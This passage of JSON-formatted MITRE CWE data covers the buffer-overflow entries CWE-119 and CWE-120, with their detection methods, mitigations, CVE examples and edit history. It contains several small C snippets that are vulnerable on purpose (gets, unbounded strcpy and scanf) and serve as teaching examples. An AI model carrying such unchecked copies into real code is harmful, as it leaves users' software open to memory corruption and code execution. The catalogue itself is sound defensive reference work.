Overflow"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"123"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"44"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1029"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Public Enemy #1: The Buffer Overrun&#34; Page 127; Chapter 14, &#34;Prevent I18N Buffer Overruns&#34; Page 441"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Memory Corruption&#34;, Page 167"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Notes":{"Note":{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"It is possible in any programming languages without memory management support to attempt an operation outside of the bounds of a memory buffer, but the consequences will vary widely depending on the language, platform, and chip architecture."}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Alternate_Terms, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Buffer Errors","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Constrain Operations within the Bounds of an Allocated Memory Buffer","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Constrain Operations within the Bounds of a Memory Buffer","attr":{"@_Date":"2010-12-13"}}]}},"120":{"attr":{"@_ID":"120","@_Name":"Buffer Copy without Checking Size of Input (\'Classic Buffer Overflow\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.","Extended_Description":"A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the \\"classic\\" case in which the program copies the buffer without restricting how much is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Resultant"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Classic Buffer Overflow","Description":"This term was frequently used by vulnerability researchers during approximately 1995 to 2005 to differentiate buffer copies without length checks (which had been known about for decades) from other emerging weaknesses that still involved invalid accesses of buffers, as vulnerability researchers began to develop advanced exploitation techniques."},{"Term":"Unbounded Transfer"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. This can often be used to subvert any other security service."},{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that your buffer is as large as you specify.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":["Build and Compilation","Operation"],"Description":"Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131)."},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code asks the user to enter their last name and then attempts to store the value entered in the last_name array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char last_name[20];printf (\\"Enter your last name: \\");scanf (\\"%s\\", last_name);","xhtml:br":["",""]}},"Body_Text":"The problem with the code above is that it does not restrict or limit the size of the name entered by the user. If the user enters \\"Very_very_long_last_name\\" which is 24 characters long, then a buffer overflow will occur since the array can only hold 20 characters total."},{"attr":{"@_Demonstrative_Example_ID":"DX-6"},"Intro_Text":"The following code attempts to create a local copy of a buffer to perform some manipulations to the data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void manipulate_string(char * string){}","xhtml:div":{"#text":"char buf[24];strcpy(buf, string);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter."},{"attr":{"@_Demonstrative_Example_ID":"DX-5"},"Intro_Text":"The code below calls the gets() function to read in data from the command line.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"}","xhtml:div":{"#text":"char buf[24];printf(\\"Please enter your name and press &lt;Enter&gt;\\\\n\\");gets(buf);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition."},{"Intro_Text":"In the following example, a server accepts connections from a client and processes the client request. After accepting a client connection, the program will obtain client information using the gethostbyaddr method, copy the hostname of the client that connected to a local variable and output the hostname of the client to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"......","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *clienthp;char hostname[MAX_LEN];// create server socket, bind to server address and listen on socket...// accept client connections and process requestsint count = 0;for (count = 0; count &lt; MAX_CONNECTIONS; count++) {}close(serversocket);","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int clientlen = sizeof(struct sockaddr_in);int clientsocket = accept(serversocket, (struct sockaddr *)&amp;clientaddr, &amp;clientlen);if (clientsocket &gt;= 0) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"clienthp = gethostbyaddr((char*) &amp;clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);strcpy(hostname, clienthp-&gt;h_name);logOutput(\\"Accepted client connection from host \\", hostname);// process client request...close(clientsocket);","xhtml:br":["","","","","",""]}}}}}},"xhtml:br":""}},"Body_Text":"However, the hostname of the client that connected may be longer than the allocated size for the local hostname variable. This will result in a buffer overflow when copying the client hostname to the local variable using the strcpy method."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1094","Description":"buffer overflow using command with long argument","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1094"},{"Reference":"CVE-1999-0046","Description":"buffer overflow in local program using long environment variable","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0046"},{"Reference":"CVE-2002-1337","Description":"buffer overflow in comment characters, when product increments a counter for a \\"&gt;\\" but does not decrement for \\"&lt;\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1337"},{"Reference":"CVE-2003-0595","Description":"By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application\'s buffers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0595"},{"Reference":"CVE-2001-0191","Description":"By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application\'s buffers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0191"}]},"Functional_Areas":{"Functional_Area":"Memory Management"},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unbounded Transfer (\'classic overflow\')"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Buffer Overflow"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Buffer overflow"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A5","Entry_Name":"Buffer Overflows","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":7,"Entry_Name":"Buffer Overflow"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-120"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-120"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"44"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}},{"attr":{"@_CAPEC_ID":"92"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Public Enemy #1: The Buffer Overrun&#34; Page 127"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-74"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Nonexecutable Stack&#34;, Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Protection Mechanisms&#34;, Page 189"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;C String Handling&#34;, Page 388"}},{"attr":{"@_External_Reference_ID":"REF-64"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-120"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-120"}}]},"Notes":{"Note":[{"#text":"At the code level, stack-based and heap-based overflows do not differ significantly, so there usually is not a need to distinguish them. From the attacker perspective, they can be quite different, since different techniques are required to exploit them.","attr":{"@_Type":"Relationship"}},{"#text":"Many issues that are now called \\"buffer overflows\\" are substantively different than the \\"classic\\" overflow, including entirely different bug types that rely on overflow exploit techniques, such as integer signedness errors, integer overflows, and format string bugs. This imprecise terminology can make it difficult to determine which variant is being reported.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-10","Modification_Comment":"Changed name and description to more clearly emphasize the \\"classic\\" nature of the overflow."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Alternate_Terms, Description, Name, Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Other_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Other_Notes, 